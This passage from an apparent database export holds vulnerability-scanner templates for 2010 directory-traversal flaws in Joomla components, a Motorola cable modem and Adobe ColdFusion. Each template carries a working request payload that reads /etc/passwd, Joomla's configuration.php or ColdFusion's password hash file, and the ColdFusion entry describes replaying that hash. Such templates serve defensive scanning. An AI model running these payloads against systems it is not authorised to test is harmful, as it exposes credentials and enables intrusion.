"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebb" }, "name": "CVE-2010-2045.yaml", "content": "id: CVE-2010-2045\n\ninfo:\n name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! 
allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12595\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2045\n - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2045\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dionesoft\n product: com_dioneformwizard\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ca00fa1c2e8785e665cbf491b2e108f921561c2dd2e87039ef156d77c44f40e5022100daf8e4b14c228b30e2c641a0c6af878823e71701c4282339b11d1f50b27f3795:922c64590222798bb761d5b6d8e72950", "hash": "5849003820349cfe0f3485a65031e796", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebc" }, "name": "CVE-2010-2050.yaml", "content": "id: CVE-2010-2050\n\ninfo:\n name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12611\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2050\n - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt\n - http://www.vupen.com/english/advisories/2010/1159\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2050\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90637\n cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: m0r0n\n product: com_mscomment\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950", "hash": "fe90aa9eb14ef1f752a4cb6db6044d3d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebd" }, "name": "CVE-2010-2122.yaml", "content": "id: CVE-2010-2122\n\ninfo:\n name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12623\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2122\n - https://www.exploit-db.com/exploits/12618\n - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2122\n cwe-id: CWE-22\n epss-score: 0.01806\n epss-percentile: 0.87868\n cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joelrowley\n product: com_simpledownload\n tags: cve2010,cve,joomla,lfi,edb,joelrowley\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205817b1f254b7fb87cd0f69682290db1a8bb6187ebdfdf121e6ead47dc2d135c0022100d9b2ce8c2c9cda540a9e6893d6568d4c20c7dda27fa0dca249cb62083226c9eb:922c64590222798bb761d5b6d8e72950", "hash": "bb517332a923215fbc02e46271351fd1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebe" }, "name": "CVE-2010-2128.yaml", "content": "id: CVE-2010-2128\n\ninfo:\n name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12607\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2128\n - http://www.exploit-db.com/exploits/12607\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2128\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.84048\n cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jequoteform\n tags: cve,cve2010,joomla,lfi,edb,harmistechnology\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e59aa470d7b6c5748d0e63fffbaa81a4831047b347273d58d3cb41ca77557c13022100ac7540e4284e4eab9793f192e0dea83d7673f2050021711441c420f87797fa77:922c64590222798bb761d5b6d8e72950", "hash": "7ae7c259c8545a57884d048645437d4c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebf" }, "name": "CVE-2010-2259.yaml", "content": "id: CVE-2010-2259\n\ninfo:\n name: Joomla! Component com_bfsurvey - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/10946\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2259\n - http://www.exploit-db.com/exploits/10946\n - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2259\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tamlyncreative\n product: com_bfsurvey_profree\n tags: cve,cve2010,joomla,lfi,edb,tamlyncreative\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fe73e1a14455f4c4289bbb04699a0783bbdb34d80aed0e6f22d7f5126162aa1302205f819b7049294b93e97e102214b01063586165e91c8abc034d8ff56771617cd4:922c64590222798bb761d5b6d8e72950", "hash": "eeaabbbcc2f87fd3e553ce18e6adc220", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec0" }, "name": "CVE-2010-2307.yaml", "content": "id: CVE-2010-2307\n\ninfo:\n name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded 
dot dot sequences in a URL request.\n impact: |\n An unauthenticated attacker can read arbitrary files from the modem filesystem, including configuration data and credentials that enable further compromise of the device. The vector is read-only (the CVSS vector below scores integrity and availability as None); it does not by itself allow files to be modified or deleted.\n remediation: Upgrade to a supported product version.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2307\n - https://www.exploit-db.com/exploits/12865\n - http://www.exploit-db.com/exploits/12865\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-2307\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81409\n cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: motorola\n product: surfboard_sbv6120e\n tags: cve2010,cve,iot,lfi,motorola,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bbfdf3607b6347ba7d7420f35506f8f2cff5bcb10afcb6d67570bbc874f0ea98022100e12d0a6af4937bca526ed8962cf3d20fcdfde6f0e14e2153b2f73251c35b4125:922c64590222798bb761d5b6d8e72950", "hash": "0500d94a9c77d0d15631b083db5d502b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec1" }, "name": "CVE-2010-2507.yaml", "content": "id: CVE-2010-2507\n\ninfo:\n name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/13981\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2507\n - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/59669\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2507\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: masselink\n product: com_picasa2gallery\n tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b399f4d9dc6b2c952a2ce9e388b0bc21714fffc806c4a6bb3f768981d57139d802206a1974d7ffcd57ea7f9084e535e8f10afddb089fec9a171050d073c28c510db6:922c64590222798bb761d5b6d8e72950", "hash": "3fc7410b2d026a4a3084c17a866b875c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec2" }, "name": "CVE-2010-2680.yaml", "content": "id: CVE-2010-2680\n\ninfo:\n name: Joomla! Component jesectionfinder - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! 
allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14064\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2680\n - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2680\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jesectionfinder\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022072b515f91c496b58e595115b0d084c1aef00d4c6ee17205d003acb4ab43c571302203b36bc9c01b393ef1b59fd113ab4455849196192ef1900eee38d59ce6a1a60a3:922c64590222798bb761d5b6d8e72950", "hash": "053d9a16b7a015a9ffccd87dfe4f9f4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec3" }, "name": "CVE-2010-2682.yaml", "content": "id: CVE-2010-2682\n\ninfo:\n name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14017\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2682\n - http://packetstormsecurity.org/1004-exploits/joomlarealtyna-lfi.txt\n - http://www.exploit-db.com/exploits/14017\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57647\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2682\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: realtyna\n product: com_realtyna\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,realtyna\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207d1d2f20ada527079788bebc1f7fb87e930823a6967b86b853d1b2d63ad60cc702203e9f6fa2c9063ccbb1dfe4f610e521bf0f622c6481c4b0cd4d1e44dd4dc57677:922c64590222798bb761d5b6d8e72950", "hash": "7d1e7e1dad4acef071a24e6a780e9e44", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec4" }, "name": "CVE-2010-2857.yaml", "content": "id: CVE-2010-2857\n\ninfo:\n name: Joomla! Component Music Manager - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the cid parameter to album.html.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14274\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2857\n - http://www.exploit-db.com/exploits/14274\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/60195\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2857\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: danieljamesscott\n product: com_music\n tags: cve,cve2010,joomla,lfi,edb,danieljamesscott\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a9df18c9b0d35866ea9765eaa67e92c811c401ee47b98f0ed80b8b20d1e61999022100bf0763eb2da8ee0ea76eaa0be32e72d2298820a16dbe45c9d2318c35b5cb37de:922c64590222798bb761d5b6d8e72950", "hash": "845b97edf0fe2265b25a77e54baf629a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec5" }, "name": "CVE-2010-2861.yaml", "content": "id: CVE-2010-2861\n\ninfo:\n name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI\n author: pikpikcu\n severity: high\n description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and 
(5) enter.cfm in CFIDE/administrator/.\n impact: |\n This template reads lib/password.properties through the locale traversal. That file holds the ColdFusion administrator and RDS password hashes (the rdspassword= and encrypted= entries the matcher keys on). As described in the referenced gnucitizen FAQ, the recovered hash can be replayed to authenticate to the administrator console on affected versions, from which code execution is typically reachable; this is why the CVE is listed in the CISA Known Exploited Vulnerabilities catalog (kev tag below) and should be treated as an active compromise path on unpatched installs.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861\n - http://www.adobe.com/support/security/bulletins/apsb10-18.html\n - http://securityreason.com/securityalert/8148\n - http://securityreason.com/securityalert/8137\n - http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2861\n cwe-id: CWE-22\n epss-score: 0.97078\n epss-percentile: 0.99753\n cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"rdspassword=\"\n - \"encrypted=\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb077ddbfc836210d14e4abbde779e3a4801cadf4c5e57973e1675ae37adab3002200a4dff0b074d16f33db367ba0f8a10fb0b418f6e9bf8cdd4f6036ec6db9d649a:922c64590222798bb761d5b6d8e72950", "hash": "d07e057ebbaef3a0a5c5aaef988beb92", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec6" }, "name": "CVE-2010-2918.yaml", "content": "id: CVE-2010-2918\n\ninfo:\n name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion\n author: daffainfo\n severity: high\n description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! 
allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.\n impact: |\n Remote file inclusion vulnerability in Joomla! Component Visites 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/31708\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2918\n - https://www.exploit-db.com/exploits/14476\n - http://www.vupen.com/english/advisories/2010/1925\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/42025\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2918\n cwe-id: CWE-94\n epss-score: 0.02847\n epss-percentile: 0.90478\n cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: visocrea\n product: com_joomla_visites\n tags: cve,cve2010,joomla,lfi,edb,visocrea\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210081baa41c250dff048e922e0bd675a0f66fa65d828db6fd1c6cff4362145b014502207a01230528658a21273d20b9529a24d7cf4f605849cae7697de730852ff82435:922c64590222798bb761d5b6d8e72950", "hash": "451cf0888021cc00b9aa63f5c50a2c25", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec7" }, "name": "CVE-2010-2920.yaml", "content": "id: CVE-2010-2920\n\ninfo:\n name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! 
allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12120\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2920\n - http://www.vupen.com/english/advisories/2010/1844\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57660\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2920\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90637\n cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: foobla\n product: com_foobla_suggestions\n tags: cve,cve2010,joomla,lfi,edb,foobla\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022036441deef54186effe4bc8c14c01564b3885f6058e30608ad2fe449e677c00a702205c4d8db4d4a05a86268c87cca7d2b6291aa83a4a825791567eefa258512efac9:922c64590222798bb761d5b6d8e72950", "hash": "c4595028cf81091c3bd09eaa6d9ff670", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec8" }, "name": "CVE-2010-3203.yaml", "content": "id: CVE-2010-3203\n\ninfo:\n name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.\n impact: |\n Successful exploitation allows an unauthenticated attacker to download arbitrary files from the web root and below. The request used here asks for ../../../configuration.php, which in Joomla! holds the database host, user and password, so a working target discloses credentials. Note that the regex matcher below expects an /etc/passwd signature (root:.*:0:0:) that never appears in configuration.php, so the probe and the matcher are out of step; align them (request /etc/passwd, or match on a configuration.php marker such as the JConfig class) before relying on a negative result.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14845\n - https://nvd.nist.gov/vuln/detail/CVE-2010-3203\n - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/\n - http://www.exploit-db.com/exploits/14845\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-3203\n cwe-id: CWE-22\n epss-score: 0.00626\n epss-percentile: 0.76748\n cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xmlswf\n product: com_picsell\n tags: cve,cve2010,edb,joomla,lfi,xmlswf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022030007981511407dd6716097c70d2348b6e7f288e57d05a177e4f9ae0bcf607ef022100aa3436a7609d718ca4639083c1b39f8585519a8c27fd56f228a6af4a2cc3eedf:922c64590222798bb761d5b6d8e72950", "hash": "5dc4a19fc1403472156328ea11c869d7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec9" }, "name": "CVE-2010-3426.yaml", "content": "id: CVE-2010-3426\n\ninfo:\n name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/14964\n - https://nvd.nist.gov/vuln/detail/CVE-2010-3426\n - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt\n - http://www.exploit-db.com/exploits/14964\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-3426\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 4you-studio\n product: com_jphone\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220368e2242aeae3d34942385d4007b77e7b65af8ff3b65d7e76ff47cfe4e9424d2022044deeec7dbd324f3233d3ce8caddb62b744042f40f60d4819692cd7d208f949b:922c64590222798bb761d5b6d8e72950", "hash": "9566b8805c78de0169810b759b1e7164", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 